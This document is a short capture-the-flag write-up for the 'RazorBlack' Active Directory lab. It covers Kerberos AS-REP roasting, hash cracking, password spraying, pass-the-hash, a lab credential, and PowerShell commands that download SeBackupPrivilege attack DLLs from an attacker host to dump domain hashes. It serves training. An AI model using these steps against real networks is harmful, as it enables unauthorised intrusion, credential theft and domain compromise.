RazorBlack

Information Gathering

sudo nmapAutomator.sh 10.10.87.225 all

This looks like a Domain Controller because Kerberos is enabled as seen on port 88, LDAP is also enabled.

Domain Name: raz0rblack.thm

Service Enumeration

SMB (Port 139/445)

Can't find anything here.

Port Mapper (Port 111)

sbradley.txt contains the first flag while empoyee_status.xlsx contains the following:

Exploit

Notice that we have Steven Bradley in row 16 and there was a sbradley.txt. Clever guessing would mean that the usernames are dport, iroyce, etc. We can then make a file of usernames.

We can then use Impacket's GetNPUsers.py to brute force Kerberos. Any responses we get are encrypted with the user's password, which we can use john to try to crack.

We see that we have a password hash for twilliams user. We can use john to crack the hash.

Looks like we got credentials.

twilliams:roastpotatoes

Using smbmap, we see an interesting share, trash, but we don't have access to it. Since we have access to the IPC$ share, we can brute force usernames.

Let's filter down all the users and see if there is anyone new that was not in the employee_status.xlsx file earlier.

Let's try the password on all users to see if the password is reused.

Notice that for the user sbradley, it says that his password must be changed. Let's do that.

Great, it looks like we have read perms to trash share. Let's download all files inside the share.

Looks like the chat log contains useful information for privesc later.

We can then use zip2john to convert the zip file into a hash for john to crack.

Let's unzip the file and extract the hashes.

Next, we use cut to extract the NTLM hashes part only.

cat hashes.txt | cut -d ":" -f 4 > ntlmhashes.txt

Then we use some vim magic to remove the first 4 lines.

Now that we are left with the NTLM hashes, we can brute force to get the correct hash.

crackmapexec smb 10.10.46.129 -u lvetrova -H ntlmhashes.txt

Now that we got the hash, we can use evil-winrm, to gain access.

In the user directory, we see an interesting XML file.

Next, we can make use of pass the hash attack using lvetrova's credentials.

Let's use john again.

Same thing as lvetrova.

Privesc

We can make use of the SeBackupPrivilege to escalate privileges. Take note that there's a space between each line.

Clone the following repo.

Upload the diskshadow.txt file.

Let's transfer the 2 DLL files next.

  1. Invoke-WebRequest http://10.9.141.31:80/home/kali/thm/razor/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll -Outfile C:\tmp\SeBackupPrivilegeUtils.dll

  2. Invoke-WebRequest http://10.9.141.31:80/home/kali/thm/razor/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll -Outfile C:\tmp\SeBackupPrivilegeCmdLets.dll

Great, now let's dump the hashes.

And, we can pass the hash under Administrator, and we got SYSTEM.

Use an magic on cyber chef to the get the flag.

PreviousRoastedNextPG Practice

Last updated